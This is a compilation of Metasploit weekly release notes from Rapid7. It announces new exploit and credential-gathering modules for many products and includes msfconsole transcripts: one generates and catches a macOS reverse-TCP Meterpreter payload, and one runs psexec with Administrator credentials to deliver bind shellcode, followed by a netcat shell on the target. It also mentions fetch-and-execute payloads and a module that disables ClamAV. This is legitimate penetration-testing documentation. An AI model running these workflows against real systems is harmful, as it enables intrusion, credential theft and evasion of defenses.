Author: Zachary Goldman

Black Hat & DEF CON

Hopefully folks were able to catch our Rapid7 researchers @zeroSteiner & Jack Heysel show off the Metasploit 6.4's features, focusing on combinations that allow for new, streamlined attack workflows at Black Hat. If not they will also be demoing at DEF CON tomorrow in room W304!

New module content (1)

Calibre Python Code Injection (CVE-2024-6782)

Authors: Amos Ng and Michael Heinzl
Type: Exploit
Pull request: #19357 contributed by h4x-x0r
Path: multi/misc/calibre_exec
AttackerKB reference: CVE-2024-6782

Description: Adds a module targeting CVE-2024-6782, an unauthenticated Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.14.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic. The injected payload will get executed in the same context under which Calibre is being executed.

Bugs fixed (1)

• #19355 from dledda-r7 - Fixes an issue where Meterpreter sessions would fail to migrate when MeterpreterDebugBuild is enabled.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.20...6.4.21
• Full diff 6.4.20...6.4.21

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit goes to Hacker Summer Camp

Next week, Metasploit will have demos at both Black Hat and DEF CON where the latest functionality from this year will be presented. The Black Hat demo will be on Thursday the 8th from 10:10 to 11:25 and the DEF CON demo will be on Saturday the 10th from 12:00 to 13:45.

The highlights will include demonstrations of:

• Exploiting unconstrained delegation entirely in Metasploit with the new post/windows/manage/kerberos_tickets module and Pass-the-Ticket support for auxiliary/gather/windows_secrets_dump. Next with secrets in hand, we’ll demonstrate forging tickets using the new diamond and sapphire techniques.
• Using the new LDAP, SMB and MSSQL session types for both interactive exploration and post modules.
• Configuring the latest DNS options for advanced pivoting scenarios.

New module content (2)

OpenMediaVault rpc.php Authenticated Cron Remote Code Execution

Authors: Brandon Perry bperry.volatile@gmail.com and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #19298 contributed by h00die-gr3y
Path: unix/webapp/openmediavault_auth_cron_rce
AttackerKB reference: CVE-2013-3632

Description: This adds a new module that leverages a vulnerability in OpenMediaVault versions starting from 1.0 until the recent release 7.4.2-2. This vulnerability (CVE-2013-3632) allows an authenticated user to create cron jobs as root on the system and achieve remote code execution.

mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)

Author: Michael Heinzl
Type: Exploit
Pull request: #19337 contributed by h4x-x0r
Path: windows/scada/mypro_cmdexe
AttackerKB reference: CVE-2023-28384

Description: This adds an exploit module for CVE-2023-28384, a command injection vulnerability in MySCADA MyPRO versions before and including 2.28 allowing the execution of arbitrary commands as NT AUTHORITY\SYSTEM.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

• #19331 from Takahiro-Yoko - This update the linux/http/empire_skywalker exploit module to add a new technique that leverages a path traversal vulnerability in BC Security Empire versions before 5.9.3 (CVE-2024-6127). An attacker can achieve unauthenticated remote code execution over HTTP by acting as a normal agent. It is still possible to use this module with older versions from ProjectEmpire/Empire by setting a specific datastore option.
• #19344 from jheysel-r7 - This updates the windows/http/forticlient_ems_fctid_sqli exploit module to gain code execution on FortiClient EMS FCTID for the affected version within the range 7.2.x.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.19...6.4.20
• Full diff 6.4.19...6.4.20

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Infiltrate the Broadcast!

A new module from Chocapikk allows the user to perform remote code execution on vulnerable versions of streaming platform AVideo (12.4 - 14.2). The multi/http/avideo_wwbnindex_unauth_rce module leverages CVE-2024-31819, a vulnerability to PHP Filter Chaining, to gain unauthenticated and unprivileged access, earning it an attacker value of High on AttackerKB.

New module content (8)

Chaos RAT XSS to RCE

Authors: chebuya and h00die
Type: Exploit
Pull request: #19104 contributed by h00die
Path: linux/http/chaos_rat_xss_to_rce
AttackerKB reference: CVE-2024-30850

Description: Adds an exploit for HAOS v5.0.8, which contains a remote command execution vulnerability which
can be triggered through one of three routes: credentials, JWT token from an agent, an agent executable can be provided, or the JWT token can be extracted.

AVideo WWBNIndex Plugin Unauthenticated RCE

Author: Valentin Lobstein
Type: Exploit
Pull request: #19071 contributed by Chocapikk
Path: multi/http/avideo_wwbnindex_unauth_rce
AttackerKB reference: CVE-2024-31819

Description: Adds a module for CVE-2024-31819 which exploits an LFI in AVideo which uses PHP Filter Chaining to turn the LFI into unauthenticated RCE.

NorthStar C2 XSS to Agent RCE

Authors: chebuya and h00die
Type: Exploit
Pull request: #19102 contributed by h00die
Path: windows/http/northstar_c2_xss_to_agent_rce
AttackerKB reference: CVE-2024-28741

Description: Adds an exploit for CVE-2024-28741 which exploits an XSS vulnerability in Northstar C2.

Adi IRC credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19169 contributed by The-Pink-Panther
Path: windows/gather/credentials/adi_irc

Description: This adds a gather module leveraging Packrat targeting Adi IRC client.

CarotDAV credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19173 contributed by The-Pink-Panther
Path: windows/gather/credentials/carotdav_ftp

Description: This adds a gather module leveraging Packrat targeting the CarotDAV FTP client.

Halloy IRC credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19165 contributed by The-Pink-Panther
Path: windows/gather/credentials/halloy_irc

Description: This adds a module leveraging Packrat to gather credentials against the Halloy IRC client.

Quassel IRC credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19166 contributed by The-Pink-Panther
Path: windows/gather/credentials/quassel_irc

Description: This adds a gather module leveraging Packrat targeting Quassel IRC client.

Sylpheed email credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19171 contributed by The-Pink-Panther
Path: windows/gather/credentials/sylpheed

Description: This adds a gather module leveraging Packrat targeting Sylpheed Email client.

Enhancements and features (1)

• #19189 from adfoster-r7 - Updates Metasploit framework's default Ruby version to 3.1.5; newer Ruby versions are also supported.

Bugs fixed (4)

• #19002 from adfoster-r7 - Fixed persistent jobs not working when rebooting MSF console.
• #19170 from sjanusz-r7 - Fixes the smb_lookupsid module hanging with STATUS_PENDING when running against Samba targets.
• #19186 from dwelch-r7 - Fixes a bug were the show advanced command could show normal options.
• #19192 from adfoster-r7 - Fix crashing mipsel modules when running Ruby 3.3.0.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.9...6.4.10
• Full diff 6.4.9...6.4.10

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New module content (3)

GitLab Password Reset Account Takeover

Authors: asterion04 and h00die
Type: Auxiliary
Pull request: #18716 contributed by h00die
Path: admin/http/gitlab_password_reset_account_takeover
AttackerKB reference: CVE-2023-7028

Description: This adds an exploit module that leverages an account-take-over vulnerability to take control of a GitLab account without user interaction. The vulnerability lies in the password reset functionality as it’s possible to provide two email addresses so that
the reset code will be sent to both. It is therefore possible to provide the email
address of the target account as well as that of one we control, and to reset the password.

MinIO Bootstrap Verify Information Disclosure

Authors: RicterZ and joel <joel @ ndepthsecurity>
Type: Auxiliary
Pull request: #18775 contributed by 6a6f656c
Path: gather/minio_bootstrap_verify_info_disc
AttackerKB reference: CVE-2023-28432

Description: This adds an auxiliary module that leverages an information disclosure (CVE-2023-28432) in a cluster deployment of MinIO versions from RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z. This retrieves all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18922 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2024_27198
AttackerKB reference: CVE-2024-27198

Description: This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and creates a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.

Enhancements and features (5)

• #18835 from zgoldman-r7 - This PR reduces code duplication in the modules/exploits/windows/mssql/mssql_payload module.
• #18899 from zeroSteiner - Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate.
• #18930 from dwelch-r7 - This PR adds the ability to run a help command from within the interactive SQL prompt.
• #18931 from cgranleese-r7 - Adds additional help information when interacting with an SQL session.
• #18932 from adfoster-r7 - This PR adds PostgreSQL session type acceptance tests using Allure report generation as well as a local test module.

Bugs fixed (5)

• #18944 from zeroSteiner - This fixes an issue when saving and loading DNS rules from the config.
• #18945 from adfoster-r7 - Fixes an issue that caused a crash when running http crawler with database connected.
• #18949 from zeroSteiner - This updates the DNS feature to notify the user a restart is required when the feature is enabled or disabled.
• #18952 from cgranleese-r7 - Updates Postgres hashdump module to now work with newer versions of Postgres.
• #18954 from adfoster-r7 - This PR fixes an issue where modules were not honoring spooler settings.

Documentation added (3)

• #18868 from zeroSteiner - This adds documentation for the new DNS command.
• #18937 from jjoshm - Fixes a typo in the Kerberos documentation.
• #18951 from adfoster-r7 - This PR improves documentation on running Postgres acceptance tests locally.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.59...6.3.60
• Full diff 6.3.59...6.3.60

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Getting Looney with Privilege Escalation

As if Metasploit couldn’t get any loonier, this release adds a brand new exploit module for Glibc Tunables Privilege Escalation aka Looney Tunables. Now, using linux/local/glibc_tunables_priv_esc, you can check your target’s glibc version to see if it’s vulnerable to buffer overflow, as outlined in CVE-2023-4911. If so, the module will drop a python script and escalate your privilege to the root user, allowing you to execute malicious code. Happy Tuning!

New module content (3)

Vinchin Backup and Recovery Command Injection

Authors: Gregory Boddin (LeakIX) and Valentin Lobstein
Type: Exploit
Pull request: #18542 contributed by Chocapikk
Path: linux/http/vinchin_backup_recovery_cmd_inject

Description: This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.

Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)

Authors: Qualys Threat Research Unit, blasty peter@haxx.in, and jheysel-r7
Type: Exploit
Pull request: #18541 contributed by jheysel-r7
Path: linux/local/glibc_tunables_priv_esc

Description: This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.

Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)

Authors: jheysel-r7
Type: Exploit
Pull request: #18566 contributed by jheysel-r7
Path: multi/http/atlassian_confluence_unauth_backup

Description:
This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server.

Enhancements and features (2)

• #18622 from zeroSteiner - Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
• #18623 from gardnerapp - This updates the file handling of the generate command's -o parameter to expand file system paths.

Bugs fixed (1)

• #18619 from adfoster-r7 - Fixed a crash when running the favorites command.

Documentation added (1)

• #18477 from AleksaZatezalo - This adds documentation for the auxiliary/scanner/nessus/nessus_rest_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.47...6.3.48
• Full diff 6.3.47...6.3.48

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Fly High in the Sky With This New Cloud Exploit!

This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital's MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!

OSX Meterpreter support for M1 and M2 devices

Thanks to the great work of usiegl00, Metasploit now has payload support for both M1 and M2 Arm64 devices that run without the x64 Rosetta emulator being installed on the target machine.

The new payloads are:
osx/aarch64/meterpreter/reverse_tcp
osx/aarch64/meterpreter_reverse_https
osx/aarch64/meterpreter_reverse_tcp
osx/aarch64/meterpreter_reverse_http

Example of generating a payload:

msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...

After executing the payload on the remote host, the session will open and can be interacted with:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: demo
meterpreter > sysinfo
Computer     : demo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >

Metasploit takes to the road

Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.

• Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
• DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom

New module content (10)

Citrix ADC (NetScaler) Forms SSO Target RCE

Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
Path: exploits/freebsd/http/citrix_formssso_target_rce
AttackerKB reference: CVE-2023-3519

Description: This adds an exploit for CVE-2023-3519 which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the nsppe process which runs as root.

Western Digital MyCloud unauthenticated command injection

Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Type: Exploit
Pull request: #18221 contributed by ErikWynter
Path: exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection
AttackerKB reference: CVE-2018-17153

Description: This adds an exploit module for an authentication bypass (CVE-2018-17153) and a command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196. The module first performs a check to validate if the target is vulnerable by attempting to leverage an authentication bypass followed by injecting a simple echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.

Rudder Server SQLI Remote Code Execution

Author: Ege Balcı
Type: Exploit
Pull request: #18205 contributed by EgeBalci
Path: exploits/multi/http/rudder_server_sqli_rce
AttackerKB reference: CVE-2023-30625

Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.

Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE

Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
Path: exploits/multi/http/subrion_cms_file_upload_rce
AttackerKB reference: CVE-2018-19422

Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.

AWS Instance Connection

Author: sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
Path: payloads/singles/cmd/unix/bind_aws_instance_connect

Description: This adds AWS instance connection sessions.

OSX AArch64 Payload Support

Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
Path: payloads/singles/osx/aarch64/meterpreter_reverse_http

Description: Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Enhancements and features (4)

• #18223 from adfoster-r7 - This PR fixes broken msfconsole command history management when switching between shell sessions.
• #18239 from h00die - Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the exploits/multi/http/apache_nifi_processor_rce RCE module.
• #18249 from adfoster-r7 - Provide better error messages when failing to load Mettle extensions, such as the extended API extapi.
• #18255 from adfoster-r7 - Removes Python2 support from the Metasploit docker container now that it is officially end of life, and no longer used by Metasploit. Python3 support remains available.

Bugs fixed (6)

• #18203 from adfoster-r7 - Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby.
• #18209 from adfoster-r7 - This fixes an issue in the windows/local/bypassuac_comhijack exploit module, which was breaking due to a syntax error.
• #18234 from D00Movenok - This fixes a bug in the 64-bit messagebox payload where it would fail to execute if user32 was not already loaded.
• #18238 from dwelch-r7 - Fixes an issue where when setting USERNAME, USER_FILE and PASS_FILE with scanner modules. Previously the first username in the USER_FILE would not be tested against any password in PASS_FILE, this is now fixed.
• #18243 from adfoster-r7 - This PR fixes an issue were an appscan import would fail due to an empty proof.
• #18248 from adfoster-r7 - Fix bootup warning when running the JSON msfrpc service.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.27...6.3.28
• Full diff 6.3.27...6.3.28

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Fetch Based Payloads: Making the Path from Command Injection to Metasploit Session Shorter

This week we’re releasing Metasploit fetch payloads. Fetch payloads are command-based payloads that leverage network-enabled applications on remote hosts and different protocol servers to serve, download, and execute binary payloads. Over the last year, two thirds of the exploit modules landed to Metasploit Framework were command injection exploits. These exploits will be much easier to write with our new payloads.You can check out the documentation here, and we’ll have a longer blog post on the feature out soon.

New Exploit: Privilege Escalation for invscout RPM

AIX systems up to and including 7.2 were vulnerable to a command injection in the invscout utility. Tim Brown and bcoles created a new module to take advantage of this, giving privilege escalation to root in these systems. This addresses CVE-2023-28528. It’s available for Framework users now at use exploit/aix/local/invscout_rpm_priv_esc.

New module content (3)

invscout RPM Privilege Escalation

Authors: Tim Brown and bcoles
Type: Exploit
Pull request: #17993 contributed by bcoles
AttackerKB reference: CVE-2023-28528

Description: This module leverages a command injection vulnerability in the setuid invscout utility on AIX systems 7.2 and prior to achieve effective-uid root privileges.

Ivanti Avalanche FileStoreConfig File Upload

Authors: Piotr Bazydlo and Shelby Pace
Type: Exploit
Pull request: #17979 contributed by space-r7
CVE reference: ZDI-23-456

Description: An exploit has been added for CVE-2023-28128, an authenticated file upload vulnerability in versions below v6.4.0.186 of Ivanti Avalanche that allows authenticated administrators to change the default path to the web root of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM. This occurs due to Ivanti Avalanche not properly validating MS-DOS style short names in the configuration path.This occurs due to Ivanti Avalanche not properly validating MS-DOS style short names in the configuration path.

Fetch Based Payloads

Author: Brendan Watters
Type: Payload
Pull request: #17782 contributed by bwatters-r7

Description: This adds a set of command payloads that facilitate fetching and executing a payload file from Metasploit.

Enhancements and features (3)

• #17985 from spmedia - Fixes a typo in the post/windows/manage/sticky_keys module.
• #17990 from bcoles - Adds AutoCheck functionality and notes metadata to exploits/aix/local/ibstat_path.
• #17991 from rad10 - A default configuration file has been added for Solargraph, a language server that can help VS Code users (and users of other code editors that might not have a language server built in) obtain IntelliSense, in-line documentation, and code completion functionality for Metasploit's code. For VS Code users, it is recommended to install the Solargraph plugin here to take advantage of this change.

Bugs fixed (3)

• #17967 from adfoster-r7 - Fixes Ruby 3.1 crashes and resource leaks when garbage collecting Meterpreter resources.
• #18005 from adfoster-r7 - This fixes a crash when running a module through Socks4a proxy.
• #18006 from adfoster-r7 - This fixes an error when msfconsole opens browser links without a display present.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.16...6.3.17
• Full diff 6.3.16...6.3.17

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

2022 Vulnerability Intelligence Report Released

Rapid7’s broader vulnerability research team released our 2022 Vulnerability Intelligence Report this week. The report includes Metasploit and research team data on exploitation, exploitability, and vulnerability profiles that are intended to help security teams understand and prioritize risk more effectively. Put simply, security teams have way too much to do in a threat climate that’s seen some pretty crazy escalation the past few years, and understanding attack trends can help them make better risk-based choices.

There are some longer threads on key findings on Twitter and Mastodon. Some of the highlights:

• Rapid7 researchers saw a modest decrease in both widespread exploitation and zero-day exploitation of new vulnerabilities in 2022. Alas, widespread threats are still the majority of 2022 vulnerabilities in our dataset, and are double what they were in 2020.
• Attackers keep getting faster — more than half the vulns in the report were exploited within a week.
• Ransomware CVE stats got weird in 2022. There are probably a lot of intersectional reasons for this.

Read the full report here!

New module content (4)

Softing Secure Integration Server Login Utility

Author: Imran E. Dawoodjee
Type: Auxiliary
Pull request: #17676 contributed by ide0x90

Description: This adds a login module for the Softing Secure Integration Server software.

Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload

Authors: HMs, l1k3beef, and sf
Type: Exploit
Pull request: #17624 contributed by sfewer-r7
AttackerKB reference: CVE-2022-21587

Description: This pull request adds an exploit module for an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, which results in remote code execution. This has been observed to have been exploited in the wild.

Lucee Authenticated Scheduled Job Code Execution

Author: Alexander Philiotis
Type: Exploit
Pull request: #17638 contributed by JBince

Description: This adds a module to execute code using Lucee's scheduled job functionality. The feature requires authentication as an administrator by default and allows a ColdFusion page to be rendered which is used to execute an OS command using the cfexecte directive. The module works on both Linux and Windows targets.

Disable ClamAV

Author: DLL_Cool_J
Type: Post
Pull request: #17672 contributed by archcloudlabs

Description: This PR includes a post module that will disable ClamAV on Linux systems. The bug resides in the ClamAV Unix socket permitting any user to submit the "shutdown" command which will disable ClamAV.

Enhancements and features (2)

• #17635 from dwelch-r7 - Updates the admin/kerberos/inspect_ticket module to display the ticket checksum and full PAC checksum
• #17699 from gwillcox-r7 - This adds SCHANNEL authentication support to LDAP modules.

Bugs fixed (5)

• #17562 from gwillcox-r7 - This fixes some incorrect Railgun definitions for the wldap32 Windows library.
• #17679 from adfoster-r7 - This PR fixes the broken payload selection for Metasploit RPC
• #17696 from zeroSteiner - The version of Metasploit Payloads in use by Metasploit has been bumped, which brings in support for the getprivs and getdesktop commands to Python Meterpreters running on Windows, and also adds support for getting the handle of processes opened via the session. Additionally, fixes were made to support Python 2.5 and to fix the getdesktop output of Python Meterpreters.
• #17697 from jheysel-r7 - This updates the exploit/linux/http/froxlor_log_path_rce module to note that Foxlor 2.0.7 is the last vulnerable version.
• #17700 from zeroSteiner - The argument validation for the route command has been reworked to improve the way it validates arguments and to print out more accurate error messages.

Documentation added (3)

• #17680 from adfoster-r7 - Improves the UX of the docs.metasploit.com module explorer. Adds 'expand all' and 'collapse all' buttons to the module explorer. Adds support for automatically opening descendant folders that only contain 1 item. Adds an additional parent folder to make it clearer to the user that the folders are clickable.
• #17687 from archcloudlabs - This PR contains additional examples on the ERB format required for the HTTPRawHeaders option for HTTP clients.
• #17695 from zeroSteiner - The LDAP query and collection projects have been removed from the GSOC 2023 list since they have already been implemented in https://github.com/rapid7/metasploit-framework/pull/16598.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.4...6.3.5
• Full diff 6.3.4...6.3.5

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

BYOS: Bring your own stager

We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.

Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the shellcode_file option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
                                                    ng-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/x64/custom/reverse_tcp):

   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   EXITFUNC        thread                   yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           10.5.135.101             yes       The listen address (an interface may be specified)
   LPORT           4567                     yes       The listen port
   SHELLCODE_FILE  x64_shell_bind_4444.bin  no        Shellcode bin to launch


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] 10.5.132.159:445 - Connecting to the server...

<hacking intensifies>

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500


[*] 10.5.132.159 - Custom session 1 closed.  Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit

Now, we can just open a netcat session to the independent bind shell we started on the target:

[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
   IPv4 Address. . . . . . . . . . . : 10.5.132.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

Module added to exploit OS Command Injection in PAN-OS

Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits an OS Command Injection vulnerability CVE-2020-2038 in PAN-OS. This exploit affects versions of PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS runs one of the leading enterprise firewalls, Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database ranks the severity of this exploit as a high 7.2, as administrators of the system are able to execute arbitrary commands with root privileges. This is due to the API not employing sufficient filtering of input for its "op" request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on PT Swarm.

New module content (4)

